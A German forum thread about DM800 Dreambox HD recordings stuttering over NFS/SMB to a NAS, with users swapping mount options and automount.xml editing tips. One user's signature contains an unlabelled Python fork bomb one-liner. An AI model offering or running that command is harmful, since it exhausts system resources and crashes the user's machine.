HD Aufnahme über Netzwerk ruckelt !

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • HD Aufnahme über Netzwerk ruckelt !

      Haaaallloooo!


      Ich habe eine DM 800 ohne eingebaute Festplatte.

      Über einen QNAP 219 p NAS Server speichere ich meine Aufnahmen.

      Bei Normalen Aufnahmen ist das auch alles kein Problem.

      Einwandfrei Aufnahme und Wiedergabe.

      Wenn ich aber einen HD Film ( getestet von mehreren HD Sendern ) aufnehmen möchte
      dann ruckelt das Bild wie verrückt.

      cfis und nfs machen keinen Unterschied.

      Über einen Windows Rechner mit Freigabe habe ich die gleichen Probleme.

      Hat jemand damit schon Erfahrungen gesammelt ??

      Gruß
      Andreas
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Hei,

      also ich habe einen Qnap TS109pro über dlan200 laufen und habe mit HD Aufnahmen auch Probleme. Allerding habe ich das bisher immer auf das Stromnetzwerk zurückgeführt und wollte das demnächst mal mit "echtem" LAN testen.

      Gruß
      cruiser

      DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Was habt ihr für rsize, wsize Werte? HD-Aufnahmen klappten mit der Netzwerkbrowser-Standardeinstellung und DLAN-200 bei mir überhaupt nicht mit einem D-Link-323 und NFS.

      mit

      Quellcode

      1. nfs,rw,nolock,soft,rsize=32768,wsize=32768

      habe ich jetzt überhaupt keine Probleme mehr 8)

      Allerdings mounte ich nicht über den Netzwerkbrowser, sondern über nachinstalliertes autofs. Jetzt kann ich sogar über DLAN Aufnahmen von der DM7020 einen Stock höher ruckelfrei anschauen, mit dem Netzwerkbrowser hatte ich da nur trouble ...

      Mir ist klar, das ich da in eine Kerbe schlage.

      P E A C E !

      *** duck´ und weg ***

      Ich stand vor der Wahl: Newnigma2 oder ein anderes Image mit autofs. Ich habe mich eben für den Mittelweg auf own risk entschieden: Newnigma2 UND autofs

      Rennt seid 2.7 und auch das update auf 2.8.1 machte keine Probleme - insbesondere nicht mit dem Devicemanager ...
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

      Dieser Beitrag wurde bereits 7 mal editiert, zuletzt von Fred Bogus Trumper ()

    • Tja dlan ist halt schrott beweis nötig?
      Ich hatte auch 2 so dlan200 das netzwerk war total lam max 2-2,5 mb/s das lankabel direkt drann schon sind es viel viel mehr.Das image kann nichts dafür das euer netzwerk zu langsam ist wer da von bugs oder so spricht sollte noch mal zur schule gehen :D

      PS wer nen QNAP 219 besitzt der sollte auch gescheite lankabel verwenden andernfalls ist das rausgeschmissenes geld.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !

    • Tja dlan ist halt schrott beweis nötig?
      Ich hatte auch 2 so dlan200 das netzwerk war total lam max 2-2,5 mb/s das lankabel direkt drann schon sind es viel viel mehr.


      EDIT:
      Ich hab´s mir überlegt ...

      No Comment
      Gruß Fred

      Die Dreambox ist tot, es lebe die Dreambox

      ¯\_(ツ)_/¯

      Quellcode

      1. root@dm920:~$ mount | grep "/ "
      2. /dev/mmcblk1p1 on / type ext4 (rw,relatime,data=ordered)
      3. root@dm920:~$

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von Fred Bogus Trumper ()

    • RE: HD Aufnahme über Netzwerk ruckelt !

      Hallo,

      ich habe eine Dreambox DM800HD PVR und würde gerne die Aufnahme auf meiner TS201
      über LAN aufnehmen können.

      Wie hast du die Verbindung hergestellt?

      Danke!
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Hallo,

      ich habe mit meiner dm800 die gleichen Probleme. Mein NAS ist eine DS209 und alle Systeme sind in einem GBit-Netzwerk via Switch Netgear GS108 GE miteinander verbunden.

      Dennoch werden keine HD-Sendungen ruckelfrei aufgenommen.

      An welcher Stelle hast Du die Eintragungen "nfs,rw,nolock,soft,rsize=32768,wsize=32768" gemacht?

      Hat sonst noch jemand diese Probleme und eventuell Lösungen dafür?

      Danke!
      Kevin

      Original von Fred Bogus Trumper
      Was habt ihr für rsize, wsize Werte? HD-Aufnahmen klappten mit der Netzwerkbrowser-Standardeinstellung und DLAN-200 bei mir überhaupt nicht mit einem D-Link-323 und NFS.

      mit

      Quellcode

      1. nfs,rw,nolock,soft,rsize=32768,wsize=32768

      habe ich jetzt überhaupt keine Probleme mehr 8)

      Allerdings mounte ich nicht über den Netzwerkbrowser, sondern über nachinstalliertes autofs. Jetzt kann ich sogar über DLAN Aufnahmen von der DM7020 einen Stock höher ruckelfrei anschauen, mit dem Netzwerkbrowser hatte ich da nur trouble ...

      Mir ist klar, das ich da in eine Kerbe schlage.

      P E A C E !

      *** duck´ und weg ***

      Ich stand vor der Wahl: Newnigma2 oder ein anderes Image mit autofs. Ich habe mich eben für den Mittelweg auf own risk entschieden: Newnigma2 UND autofs

      Rennt seid 2.7 und auch das update auf 2.8.1 machte keine Probleme - insbesondere nicht mit dem Devicemanager ...
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Hallo,

      also ich habe die automount.xml editiert und für meine nfs-mounts wie folgt geändert.

      Quellcode

      1. udp,rw,nolock,soft,noatime

      Ich nutze jetzt allerdings eine Synology DS209+II anstatt des Qnap TS109Pro und seit dem klappt sogar Streaming von 1080p mkv mit DTS, was vorher nicht geklappt hat.
      Somit hatte mein Problem nichts mit der Qualität des dlan, sondern mit dem NAS zu tun.

      Gruß
      cruiser

      DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily

      Dieser Beitrag wurde bereits 3 mal editiert, zuletzt von cruiser ()

    • RE: HD Aufnahme über Netzwerk ruckelt !

      wo steht die automount.xml? mein file search kann die datei nicht finden.

      Danke!
      Kevin

      Original von cruiser
      Hallo,

      also ich habe die automount.xml editiert und für meine nfs-mounts wie folgt geändert.

      Quellcode

      1. udp,rw,nolock,soft,noatime

      Ich nutze jetzt allerdings eine Synology DS209+II anstatt des Qnap TS109Pro und seit dem klappt sogar Streaming von 1080p mkv mit DTS, was vorher nicht geklappt hat.
      Somit hatte mein Problem nichts mit der Qualität des dlan, sondern mit dem NAS zu tun.

      Gruß
      cruiser
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Also ich habe jetzt mal beide hier im Thread vorgeschlagenen Änderungen der automount.xml probiert.

      Das Ergebnis ist, dass ich bei beiden Änderungen keinen Zugriff mehr auf mein NAS habe.

      Abhilfe schafft nur die Rücksetzung auf die Standardwerte "rw,nolock".

      Muss ich noch irgendwo etwas verändern? Oder woran könnte das liegen?

      Ich nutze den Standard Freigabemanager von NE 2.8.3. Auch sonst ist alles Standard.

      Danke!
      Kevin
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Original von Kevalo
      Also ich habe jetzt mal beide hier im Thread vorgeschlagenen Änderungen der automount.xml probiert.

      Das Ergebnis ist, dass ich bei beiden Änderungen keinen Zugriff mehr auf mein NAS habe.

      Abhilfe schafft nur die Rücksetzung auf die Standardwerte "rw,nolock".

      Muss ich noch irgendwo etwas verändern? Oder woran könnte das liegen?

      Ich nutze den Standard Freigabemanager von NE 2.8.3. Auch sonst ist alles Standard.

      Danke!
      Kevin


      ... wie hast du die Änderung vorgenommen?
      Ich gehe immer so vor:
      - über telnet: init 4 (enigma2 stoppen)
      - automount.xml editieren
      - über telnet: init 3 (enigma2 starten)

      Gruß
      cruiser

      DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Ich habe es auf 2 unterschiedliche Arten versucht:

      1. Über DCC. Edit der automount.xml, speichern und anschließendes Neustarten der Box

      2. Über den Freigabemanager im NM. Editieren der Freigabeoptionen mit der Fernbedienung und anschließende Aktivierung der Freigabe mit OK. Rückmeldung war, dass Freigabe aktiviert wurde. Danach ebenfalls Neustart der Box.

      In beiden Fällen war - wie gesagt - danach kein Zugriff mehr auf mein NAS möglich.

      Gibt es einen erklärbaren Unterschied im Ergebnis zu Deiner Vorgehensweise?

      Gruß
      Kevin


      Original von cruiser
      Original von Kevalo
      Also ich habe jetzt mal beide hier im Thread vorgeschlagenen Änderungen der automount.xml probiert.

      Das Ergebnis ist, dass ich bei beiden Änderungen keinen Zugriff mehr auf mein NAS habe.

      Abhilfe schafft nur die Rücksetzung auf die Standardwerte "rw,nolock".

      Muss ich noch irgendwo etwas verändern? Oder woran könnte das liegen?

      Ich nutze den Standard Freigabemanager von NE 2.8.3. Auch sonst ist alles Standard.

      Danke!
      Kevin


      ... wie hast du die Änderung vorgenommen?
      Ich gehe immer so vor:
      - über telnet: init 4 (enigma2 stoppen)
      - automount.xml editieren
      - über telnet: init 3 (enigma2 starten)

      Gruß
      cruiser
    • RE: HD Aufnahme über Netzwerk ruckelt !

      Hei,

      also über DCC ist schon ok, aber man muss meines Wissens nach vorher per telnet "init 4" machen, da sonst die Änderungen in enigma2 gar nicht angenommern werden.
      Anschliessend init 3 zum Starten von enigma2 eingeben.
      Ich habe es gerade noch mal ausprobiert und klappt tadellos.
      Im GUI wirst du diese Änderungen nicht sehen, sie werden auch bei Eingabe über den GUI nicht wirklich gespeichert - warum weiss ich nicht.

      Gruß
      cruiser

      DM900UHD DVB-C/T2 Newnigma2 OE 2.5 Daily
    • Ich habe das Problem zwischen 800er und 8000er.
      Habe die automount editiert - aber: danach finden sich die Boxen nicht mehr, und wenn ich über die Box den Mount neu starte, ist die automount wieder wie vorher. Meine Einstellungen sind dann weg. Dafür finden sich die Boxen wieder! ???
      WARUM?

      Jemand das gleiche Problem?
    • Hab meine Erfahrungen dazu in einem anderen Thread: Probleme beim Abspielen von mkv und Aufnehmen SD schon einmal berichtet.
      Behaupte nachwievor, daß das ein Treiberproblem im Newnigma ist, weil in anderen Images konnte ich mkv's/ HD-Aufnahmen sauber abspielen. Leider hat zu der Problematik von den Mod's noch keiner Stellung genommen.
      Gelöst hab ich das Problem mit Barry Allen, weil ich auf das Newnigma nicht verzichten wollte.

      gruß redskyfox
    • Hallo Leute,

      habe da sowas ähnliches, vielleicht hilft´s ja ein wenig Licht in die Sache zu kriegen.

      Habe ne DM800 PVR über HP-Switch an einem eigenem Server mit Debian drauf. Als erstes habe ich den Share über einen Samba Server auf besagtem Server gemacht (hat knapp 5TB HDD-Speicher). Leider gab´s da auch immer nur geruckel beim Ansehen von Aufnahmen. Auch bei ganz normalen SD, von HD ganz zu schweigen.
      Daraufhin hat mir ein anderer hier im Forum enpfohlen statt Samba einen NFS Server zu installieren, weil das besser für´s Streamen über´s Netz ist. Gesagt, getan leider ohne Erfolg. Ich bin mir mittlerweile nicht mehr sicher ob das ein Problem meines Servers (Pentium 4, 3Ghz, 3,5Gb Speicher, Adaptec RAID Controler SATA Western Digital 24/7 Server Platten) oder der Dreambox ist. Am Netzwerk kann es nicht liegen, das "schläft sich aus", Bandwith Usage < 10%.(gemessen am HP Procurve Switch)
      Gestern bin ich zufällig auf die Timeshiftfunktion gekommen und musste feststellen, dass die DM800 brutalst in die Knie geht. Ich wollte den Videotext öffnen und habe mit drehenden Zahnrädern knapp 20 Sek darauf gewartet. Das konnte ich auch reproduzieren. Kann man die Performance irgendwie testen? Bin mitterweile schon ziemlich ratlos.

      Greets !

      Peter
    • Original von Donnerkalle
      Daraufhin hat mir ein anderer hier im Forum enpfohlen statt Samba einen NFS Server zu installieren, weil das besser für´s Streamen über´s Netz ist.
      ..was auch völlig richtig ist.

      Gesagt, getan leider ohne Erfolg.


      Dann wechsle das Protokoll (udp statt tcp / oder umgekehrt - je nachdem was bisher nicht zuverlässig funktioniert; und spiele mit den r-/wsize-Parametern.

      Kann man die Performance irgendwie testen?


      Welche? Dass die 800er untermotorisiert ist werden nur diejenigen bestreiten, die nichts anderes kennen/gesehen haben. Testen muss man da nix :D

      Sollte es um einen Netzwerkperformancetest in Sachen NFS gehen, dann findest Du hier NFS Verbindung Dm800 zu DM7020 auf der ersten Seite ein Script, das @arianeboxer eingestellt hat.